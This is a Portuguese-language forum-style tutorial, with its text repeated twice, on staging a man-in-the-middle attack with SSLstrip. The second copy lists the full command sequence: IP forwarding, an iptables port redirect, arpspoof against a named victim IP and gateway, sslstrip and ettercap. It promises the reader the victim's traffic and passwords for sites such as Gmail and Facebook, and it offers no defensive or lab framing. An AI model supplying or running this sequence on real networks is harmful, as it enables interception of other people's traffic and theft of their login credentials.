E ai Personas... Tudo Beleza, Bom depois de muitos estudos vendo qual metudo era melhor para se aplicar e tals, preferi escolher este, pois foi o que me deu mais resultados ok...
Vamos la...
Como usar a ferramenta SSLSTRIP para realizar um ataque do tipo MITM (man-in-the-middle) ou homem do meio
Bom, o ataque funciona da seguinte maneira... Quem esta monitorando a rede vai interceptar dados que são mandados da "vítima" para o modem ou ponto de acesso...
Quem Pega esses dados (Pacotes de infomeções) é quem esta efetuando o ataque.
Bom e como pegar estes pacotes...
Bom Primeiro tem que localizar o IP da vitima, e o IP do default gateway...
depois de localizados, abrimos o primeiro terminal e digitamos o seguinte código
Esse comando habilita o redirecionamento de pacotes.
No segundo terminal digite:
esse comando faz o redirecionamento dos pacotes da porta 80 para porta 1000 da máquina do atacante.
No terceiro terminal digite:
Lembre-se de modificar os IPs de acordo com o seu, esse comando vai “atrapalhar” a tabela arp da vítima fazendo com que ele mande todo trafego que ia para o gateway para o atacante...
No quarto terminal digite o seguinte:
Esse comando faz a leitura de todos os dados na porta 1000
De volta no primeiro terminal digite o seguinte:
Após esse passo a “vítima” deve acessar algum site que seja necessário autenticação, gmail, hotmail, facebook, twitter, etc…
Bom sendo assim vc vai começar a ver todo o trafego dela, tendo também algum acesso a senhas caso ela entre em algum site que peça assim como os sitados acima...
Muito obrigado espero que gostem e tirem o maximo de proveito do conteudo
Vamos la...
Como usar a ferramenta SSLSTRIP para realizar um ataque do tipo MITM (man-in-the-middle) ou homem do meio
Bom, o ataque funciona da seguinte maneira... Quem esta monitorando a rede vai interceptar dados que são mandados da "vítima" para o modem ou ponto de acesso...
Quem Pega esses dados (Pacotes de infomeções) é quem esta efetuando o ataque.
Bom e como pegar estes pacotes...
Bom Primeiro tem que localizar o IP da vitima, e o IP do default gateway...
depois de localizados, abrimos o primeiro terminal e digitamos o seguinte código
Código:
echo 1 > /proc/sys/net/ipv4/ip_forward
No segundo terminal digite:
Código:
iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-port 1000
No terceiro terminal digite:
Código:
arpspoof -i eth0 -t 192.168.2.112 192.168.1.1
No quarto terminal digite o seguinte:
Código:
sslstrip -l 1000
De volta no primeiro terminal digite o seguinte:
Código:
ettercap -Tq -i eth0
Bom sendo assim vc vai começar a ver todo o trafego dela, tendo também algum acesso a senhas caso ela entre em algum site que peça assim como os sitados acima...
Muito obrigado espero que gostem e tirem o maximo de proveito do conteudo